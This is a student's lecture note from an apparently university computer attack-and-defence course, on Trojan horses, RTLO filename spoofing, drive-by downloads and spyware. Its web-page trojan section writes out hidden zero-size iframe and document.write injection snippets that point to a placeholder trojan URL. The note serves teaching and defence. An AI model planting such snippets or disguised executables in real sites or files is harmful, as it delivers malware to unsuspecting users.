--- title: The Attack and defense of computers listen 3 (9/30) --- 電腦攻擊與防禦 === ###### tags: `電腦攻防` `Note` - [課程資訊](https://hackmd.io/@Onebone/SkDTwUeBP/https%3A%2F%2Fhackmd.io%2F_tge1tPkTau8DDkZcIcMzg) - [發問系統](https://tlk.io/ncu-security-2020) - [Previous Note 2020/09/23](https://hackmd.io/HYgyEZRwR--TZ3CNNQE_0A) - [Note L4 10/07](https://hackmd.io/xOx4-bR3T0avQrC0Ny8Aiw?view) # Categories og Trojan Horse - a useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. - Examples include various implementations of - weather alerting programs - computer clock setting software - peer to peer file sharing utilities. - a standalone program that masquerades as something else, like a game or image file (e.g. **firework.jpg.exe** in **Windows** > 把惡意程式投射到系統中 # Malware Parasitizes inside Trojan Horses - spying (packet sniffer) - backoor > 不一定要有上面這兩個才是木馬，但通常都有這兩個 # Unicode控制字元202E 副檔名欺騙 (RTLO) - 該手法係利用作業系統解讀檔案名稱時，若遇到Unicode控制字元，會改變檔案名稱的顯示方式進行攻擊。attacker可以在檔案名稱中，插入特定的Unicode控制字元，導致作業系統在顯示該檔案名稱時，誤導使用者。 - e.g. Unicode控制字元202E，該控制碼為不可視字元，可控制後續字元由右至左顯示(Right To Left Override) - 大師兄[202E]gpj.exe (real filename) - 大師兄exe.jpg (displayed filename) # Downloaded Files - The infected program doesn't have to arrive via email, though; it can be - sent to you in an **Instant Message** - downloaded from a Web site or by **FTP** - delivered on a **CD** # Precautions against Trojan Horses - e-mail - avoid P2P - Kazaa - Limewire - Ares - Gnutella # 網頁掛馬 (drive-by-download) - 又稱為「網頁隱藏式惡意連結」 - 攻擊者會先針對某個漏洞 (通常是 Windows 或 IE 的漏洞) 設計出一個特殊的網頁 (也就是木馬網頁)，當被攻擊的一般使用者瀏覽這個網頁，就會利用該漏洞無聲無息的趁機將惡意程式下載到被攻擊的電腦中然後運行。 ## Websites - **IE** - Some of the IE bugs improperly handle data (such as **HTML** or **images**) by executing it as a legitimate program. - Attackers who find such vulnerabilities can then specially craft **a bit of malformed data** so that it contains a **valid program** to do their bidding. ## Features vs. Risks - The more "features" a web browser has, the higher your risk of having security holes that can be exploited by an attacker. - e.g. - **ActiveX** objects, - some older versions of **Flash** - **Java** ## Dangerous Web Site - The web site pointed by the following URL is one containing the trap described in the previous slides. - HTTP MSIE JavaScript OnLoad Rte CodeExec # 網頁掛馬語法 - 通常被利用**弱點** **SQL Injection**等手法掛馬後，會在該網頁的**第一行或最後一行中**出現**相關被掛馬語法**. ## 框架 (iframe) 掛馬 - `<iframe src=木馬網址 width=0 height=0></iframe>` ## JScript 文件掛馬 - 首先將以下語法存檔為 xxx.js - `document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");` - 然後將此文件的URL利用各種方式上傳到目標處。 - e.g. - `<script language=javascript src=xxx.js></script>` # Spyware - **Spyware** is computer software that is installed surreptitiously on a personal computer to - monitor - intercept - take partial control over - the user's interaction with the computer, without the user's informed consent.